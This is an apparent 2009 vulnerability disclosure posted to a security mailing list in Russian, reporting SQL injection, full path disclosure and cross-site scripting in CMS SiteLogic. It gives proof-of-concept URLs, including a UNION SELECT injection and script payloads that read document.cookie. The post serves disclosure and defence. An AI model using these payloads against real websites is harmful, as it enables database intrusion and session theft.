Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

osTicket v1.6 RC4 Admin Login Blind SQLi

AjaxPortal v3.0 Remote File Inclusion Vulnerability

Mega File Manager Remote File Vuln

MULTIPLE SQL INJECTION VULNERABILITIES --PHP-AddressBook v-4.0.x-->

From:	MustLive <mustlive_(at)_websecurity.com.ua>
Date:	29.06.2009
Subject:	Vulnerabilities in CMS SiteLogic

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною SQL Injection, Full path disclosure и
Cross-Site Scripting уязвимостях в CMS SiteLogic.

SQL Injection:

http://site/index.php?mid=-1%20union%20select%201,1,
version(),1,1,1,1,1

Full path disclosure:

http://site/index.php?mid=’

http://site/includes/stat.php

XSS:

http://site/index.
php?mid=10&action=news_full&search_item=%22%3E%3Cscript%3
Ealert(document.cookie)%3C/script%3E

http://site/index.
php?mid=45&action=search_list&str=%3Cscript%3Ealert(document.
cookie)%3C/script%3E

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/3272/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua

!DSPAM:4a476849181911137984373!